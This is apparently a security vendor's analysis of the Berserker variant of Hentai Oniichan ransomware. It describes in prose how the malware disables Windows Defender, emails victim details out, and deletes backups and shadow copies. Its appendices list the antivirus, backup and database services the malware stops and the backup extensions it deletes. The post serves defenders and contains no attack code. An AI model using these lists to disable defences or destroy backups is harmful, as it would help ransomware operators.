In this Malware Analysis Spotlight, we analyze the Berserker variant of Hentai Oniichan Ransomware.

We’ve observed at least two different variants of Hentai Oniichan Ransomware in-the-wild, King Engine, and Berserker. What we found interesting in our analysis of the Berserker variant is its attempts to make recovery difficult by deleting backup files, uncommon with traditional ransomware.

View the VMRay Analyzer Report for Hentai Oniichan Ransomware (Berserker Variant)

Hentai Oniichan Ransomware (Berserker Variant) Analysis

As a first step, Berserker injects code into a newly created process of the sample.

Initially, Berserker starts enumerating running processes in an attempt to terminate all processes that match its internal list (Figure 1).

After it finishes with process enumeration, Berserker tries to responsible for backups (see Appendix for a complete list), monitoring, or anything that could prevent it from encrypting files (Figure 2).

Berserker executes multiple Powershell commands during its execution. To make sure this is possible it tries to adjust certain settings and preferences (Figure 3). Following that, it also adjusts preferences for Windows Defender like disabling real-time monitoring and behavior monitoring.

The ransomware transmits the user name, computer name, and client key to an external server by sending an email. It uses Powershell to construct and send it via Gmail’s SMTP server, whereby the script contains the plain login credentials (Figure 4.1 & 4.2).

Berserker makes recovery more difficult by deleting backup files. Usually, ransomware targets the recovery feature provided by Microsoft Windows. They disable the recovery mode, delete shadow copies, and the backup catalog.

While most ransomware stops at this point, Berserker goes the extra length by attempting to delete potential backup and disk image files. It searches for the extensions .vhd, .bac, .bak, .wbcat, .bkf, .set, .win, .dsk and for files within directories called “Backup” or “backup” in the root directory of the filesystem (Figure 5). Typically, ransomware encrypts backups and doesn’t remove them, except for Shadow Copies. By removing the backups instead of encrypting the Berserker is potentially faster but carries the risk of deleting something they can’t restore. In the case of virtual disk files used as additional data storage and not for backups, the data is lost.

Recently, we have seen another approach used by RegretLocker which also targets virtual disk image files. Instead of deleting them, the RegretLocker ransomware mounts the image files and encrypts the data inside.

Encryption

Berserker is written in C++ and is statically compiled against the library Crypto++.

For the encryption, Berserker iterates over the whole hard drive using depth-first search. It uses block-lists as a filtering mechanism. If a folder name or file extension is on its internal block-lists (see Appendix for a complete list) the file or directory is skipped. If the file is not on the list it is encrypted later on and gets the extension .HOR.

The ransomware also doesn’t forget to deliver its ransom note. It drops two types of notes: one that is dropped on the desktop warning the user to not kill the running process (Figure 6).

The second ransom note is used as a replacement for the desktop wallpaper where the actual ransom demand and contact information is written (Figure 7).

Conclusion

In contrast to most ransomware, Berserker targets additional files and directories to make recovery more complicated. To do so, it heavily relies on Powershell and cmd. For example, Windows Defender mitigation, recovery feature, and email transmissions are handled by using Powershell.

Furthermore, we have found several log messages referenced in the code and during the dynamic analysis, the sample creates empty log files. This could indicate that the malware is still under development.

With VMRay’s unique dynamic analysis technology and the intelligent monitoring system at the hypervisor layer, malware analysts can quickly and reliably reconstruct the big picture of the malware’s behavior regardless of the complexity of the threat or its behavior.

IOCs

Sample

4444458bf47925c82431843fd147aabbfbee71ca849fc711cb69b0cea01f474

Appendix

List of Disabled Services

Acronis VSS Provider
AcronisAgent
AcrSch2Svc
Antivirus
ARSM
AVP
BackupExecAgentAccelerator
BackupExecAgentBrowser
BackupExecDeviceMediaService
BackupExecJobEngine
BackupExecManagementService
BackupExecRPCService
BackupExecVSSProvider
bedbg
ccEvtMgr
ccSetMgr
Culserver
dbeng8
dbsrv12
DCAgent
DefWatch
EhttpSrv
ekrn
Enterprise Client Service
EPSecurityService
EPUpdateService
EraserSvc11710
EsgShKernel
ESHASRV
FA_Scheduler
IISAdmin
IMAP4Svc
KAVFSGT
kavfsslp
klnagent
macmnsvc
masvc
MBAMService
MBEndpointAgent
McAfeeEngineService
McAfeeFrameworkMcAfeeFramework
McShield
McTaskManager
mfefire
mfemms
mfevtp
MMS
mozyprobackup
MsDtsServer100
MsDtsServer110
MSExchangeES
MSExchangeIS
MSExchangeMGMT
MSExchangeMTA
MSExchangeSA
MSExchangeSRS
msftesql$PROD
msmdsrv
MSOLAP$SQL_2008
MSOLAP$SYSTEM_BGC
MSOLAP$TPSAMA
MSSQL$BKUPEXEC
MSSQL$ECWDB2
MSSQL$PRACTICEMGT
MSSQL$PRACTTICEBGC
MSSQL$PROD
MSSQL$PROFXENGAGEMENT
MSSQL$SBSMONITORING
MSSQL$SHAREPOINT
MSSQL$SOPHOS
MSSQL$SQL_2008
MSSQL$SQLEXPRESS
MSSQL$SYSTEM_BGC
MSSQL$TPSAMA
MSSQL$VEEAMSQL2008R2
MSSQL$VEEAMSQL2012
MSSQLFDLauncher$PROFXENGAGEMENT
MSSQLFDLauncher$SBSMONITORING
MSSQLFDLauncher$SHAREPOINT
MSSQLFDLauncher$SQL_2008
MSSQLFDLauncher$SYSTEM_BGC
MSSQLFDLauncher$TPSAMA
MSSQLSERVER
MSSQLServerADHelper100
MSSQLServerOLAPService
MySQL57
MySQL80
NetMsmqActivator
ntrtscan
OracleClientCache80
PDVFSService
POP3Svc
QBCFMonitorService
QBIDPService
QuickBoooks.FCS
ReportServer$SQL_2008
ReportServer$SYSTEM_BGC
ReportServer$TPSAMA
RESvc
RTVscan
SAVAdminService
SavRoam
SAVService
SepMasterService
ShMonitor
Smcinst
SmcService
SMTPSvc
SNAC
SntpService
Sophos Agent
Sophos AutoUpdate Service
Sophos Clean Service
Sophos Device Control Service
Sophos File Scanner Service
Sophos Health Service
Sophos MCS Agent
Sophos MCS Client
Sophos Message Router
Sophos Safestore Service
Sophos System Protection Service
Sophos Web Control Service
sophossps
SQL Backups
sqladhlp
SQLADHLP
sqlagent
SQLAgent$BKUPEXEC
SQLAgent$CITRIX_METAFRAME
SQLAgent$CXDB
SQLAgent$ECWDB2
SQLAgent$PRACTTICEBGC
SQLAgent$PRACTTICEMGT
SQLAgent$PROD
SQLAgent$PROFXENGAGEMENT
SQLAgent$SBSMONITORING
SQLAgent$SHAREPOINT
SQLAgent$SOPHOS
SQLAgent$SQL_2008
SQLAgent$SQLEXPRESS
SQLAgent$SYSTEM_BGC
SQLAgent$TPSAMA
SQLAgent$VEEAMSQL2008R2
SQLAgent$VEEAMSQL2012
sqlbrowser
SQLBrowser
SQLsafe Backup Service
SQLsafe Filter Service
SQLSafeOLRService
sqlserv
SQLSERVERAGENT
SQLTELEMETRY$ECWDB2
sqlwriter
SQLWriter
svcGenericHost
swi_filter
swi_service
swi_update_64
Symantec System Recovery
TmCCSF
tmlisten
tomcat6
TrueKeyScheduler
TrueKeyServiceHelper
UI0Detect
Veeam Backup Catalog Data Service
VeeamBackupSvc
VeeamBrokerSvc
VeeamCatalogSvc
VeeamCloudSvc
VeeamDeploymentService
VeeamDeploySvc
VeeamEnterpriseManagerSvc
VeeamHvIntegrationSvc
VeeamMountSvc
VeeamNFSSvc
VeeamRESTSvc
VeeamTransportSvc
vmware-converter
vmware-usbarbitator64
W3Svc
wrapper
WRSVC

List of Ignored Extensions

.bak
.bin
.c
.cpp
.ps1
.hpp
.cmd
.com
.dat
.DAT
.db
.dll
.exe
.h
.inf
.ini
.ink
.js
.lib
.lnk
.sys
.vbs
.ws